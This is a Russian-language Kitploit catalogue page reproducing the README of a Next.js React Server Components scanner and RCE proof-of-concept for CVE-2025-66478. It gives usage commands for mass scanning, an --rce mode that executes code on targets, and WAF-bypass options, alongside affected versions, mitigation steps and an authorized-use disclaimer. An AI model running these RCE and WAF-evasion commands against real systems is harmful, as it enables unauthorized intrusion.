Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC2-CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на Проникновение
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
8 месяцев назадЕщё не проверено

React2Shell Ultimate — сканер CVE-2025-66478

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

Самый всеобъемлющий сканер уязвимости удалённого выполнения кода Next.js RSC

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modes: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  WAF Bypass: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Обзор уязвимости

CVE-2025-66478 (также известная как CVE-2025-55182) — это КРИТИЧЕСКАЯ (CVSS 10.0) уязвимость удалённого выполнения кода, затрагивающая приложения Next.js, использующие React Server Components (RSC).

Затронутые версии

✨ Возможности

Этот инструмент объединяет лучшие возможности нескольких сканеров CVE-2025-66478:

🚀 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Install dependencies
pip install -r requirements.txt

# Or install manually
pip install requests tqdm

📖 Использование

Базовое сканирование

root@kitploit:~
# Version detection only (fastest, no exploitation)
python3 react2shell-ultimate.py -u https://target.com --version

# Safe side-channel detection (no code execution)
python3 react2shell-ultimate.py -u https://target.com --safe

# RCE proof-of-concept (executes harmless calculation: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Comprehensive scan with all bypass attempts
python3 react2shell-ultimate.py -u https://target.com --comprehensive

Массовое сканирование

root@kitploit:~
# Scan multiple targets from file
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Quiet mode - only show vulnerable hosts
python3 react2shell-ultimate.py -l targets.txt -q

# JSON output to stdout
python3 react2shell-ultimate.py -l targets.txt --json

Сканирование локальных проектов

root@kitploit:~
# Scan current directory
python3 react2shell-ultimate.py --local .

# Scan specific project path
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

Техники обхода WAF

root@kitploit:~
# Junk data bypass (adds 128KB padding to evade content inspection)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Custom junk data size
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Unicode encoding bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Vercel-specific WAF bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Windows target (PowerShell payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

Расширенные параметры

root@kitploit:~
# With proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Custom headers
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Increased timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Verbose output
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 Параметры командной строки

🔬 Методы обнаружения

1. Безопасное обнаружение по побочному каналу (--safe)

Вызывает определённый шаблон ошибки в ответе без выполнения какого-либо кода. Определяет уязвимые реализации RSC по поведению обработки ошибок.

2. RCE Proof-of-Concept (--rce)

Выполняет безвредное математическое вычисление (echo $((41*271)) = 11111) для подтверждения возможности RCE. Результат появляется в заголовке X-Action-Redirect.

3. Определение версии (--version)

  • Проверяет заголовок X-Powered-By на версию Next.js
  • Анализирует заголовок Vary на признаки RSC
  • Проверяет RSC-эндпоинты на ответы text/x-component
  • Сканирует исходный код страниц на признаки Next.js

4. Локальное сканирование (--local)

Сканирует директории проектов на наличие:

  • package.json — прямое объявление зависимости
  • package-lock.json — lock-файл NPM
  • yarn.lock — lock-файл Yarn
  • pnpm-lock.yaml — lock-файл PNPM
  • bun.lockb — lock-файл Bun

📊 Примеры вывода

Вывод в консоль

root@kitploit:~
[VULNERABLE] https://target.com
    Version: 15.3.1 | Status: 200 | Method: rce_poc
    WAF Bypass: SUCCESS

[NOT VULNERABLE] https://safe-target.com
    Version: 15.5.7 | Status: 200 | Method: http_headers

[WAF BLOCKED] https://protected.com
    Version: 15.2.0 | Status: 403 | Method: rce_poc
    WAF Detected: Exploit blocked

Вывод в JSON

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ Устранение уязвимости

Если вы обнаружили уязвимые приложения:

  1. Немедленно обновитесь до исправленных версий:

    • Next.js 15.x → обновитесь до 15.5.7+ (или соответствующего патча вашей минорной версии)
    • Next.js 16.x → обновитесь до 16.0.7+
  2. Временные меры защиты:

    • Используйте Edge Runtime вместо Node.js runtime
    • Отключите Server Actions, если они не нужны
    • Разместите приложение за WAF с обнаружением RSC-полезных нагрузок
  3. Отслеживайте попытки эксплуатации в журналах

📚 Ссылки

  • Рекомендация по безопасности Next.js — CVE-2025-66478
  • Исследование Assetnote — React2Shell
  • NVD — CVE-2025-66478

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.

  • Сканируйте только те системы, на тестирование которых у вас есть явное разрешение
  • Режим RCE PoC выполняет код на целевых системах (безвредное вычисление)
  • Несанкционированный доступ к компьютерным системам противозаконен
  • Автор не несёт ответственности за неправомерное использование этого инструмента

📄 Лицензия

Лицензия MIT — подробности в файле LICENSE.


⭐ Поставьте звезду этому репозиторию, если он вам полезен! ⭐

Скачать инструмент
Диапазон версийСтатус
Next.js 15.0.0 - 15.0.4⚠️ Уязвима
Next.js 15.1.0 - 15.1.8⚠️ Уязвима
Next.js 15.2.0 - 15.2.5⚠️ Уязвима
Next.js 15.3.0 - 15.3.5⚠️ Уязвима
Next.js 15.4.0 - 15.4.7⚠️ Уязвима
Next.js 15.5.0 - 15.5.6⚠️ Уязвима
Next.js 16.0.0 - 16.0.6⚠️ Уязвима
Next.js 14.3.0-canary.77+⚠️ Уязвима
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Исправлена
Next.js 16.0.7+✅ Исправлена
Next.js 13.x, 14.x stable✅ Не затронута
ВозможностьОписание
🔍 Многорежимное обнаружениеБезопасный побочный канал, RCE PoC, только версия, локальное сканирование
🛡️ Техники обхода WAFЗаполнение мусорными данными, Unicode-кодирование, обход для Vercel
📁 Сканирование локальных проектовСканирование package.json и lock-файлов на уязвимые зависимости
⚡ Высокая производительностьМногопоточное сканирование с настраиваемой конкурентностью
📊 Несколько форматов выводаКонсоль, JSON, экспорт в файл
🎯 Точное определение версииHTTP-заголовки, снятие отпечатков RSC, учёт исправленных версий
ПараметрОписание
-u, --urlОдин URL для сканирования
-l, --listФайл со списком URL (по одному в строке)
--localСканировать локальную директорию проекта
--safeБезопасное обнаружение по побочному каналу (без RCE)
--rceРежим proof-of-concept RCE
--versionТолько определение версии
--comprehensiveПолное сканирование со всеми техниками
--waf-bypassДобавить мусорные данные для обхода WAF
--waf-bypass-sizeРазмер мусорных данных в КБ (по умолчанию: 128)
--unicodeUnicode-кодирование для обхода WAF
--vercel-bypassОбход WAF для Vercel
--windowsИспользовать полезную нагрузку Windows PowerShell
-t, --threadsПараллельные потоки (по умолчанию: 10)
--timeoutТайм-аут запроса в секундах (по умолчанию: 10)
-k, --insecureОтключить проверку SSL
--proxyURL прокси (http://host:port)
-H, --headerПользовательский заголовок (можно указывать несколько раз)
-o, --outputВыходной файл (JSON)
--all-resultsСохранять все результаты, не только уязвимые
-v, --verboseПодробный вывод
-q, --quietПоказывать только уязвимые хосты
--jsonВывод JSON в stdout
--no-colorОтключить цветной вывод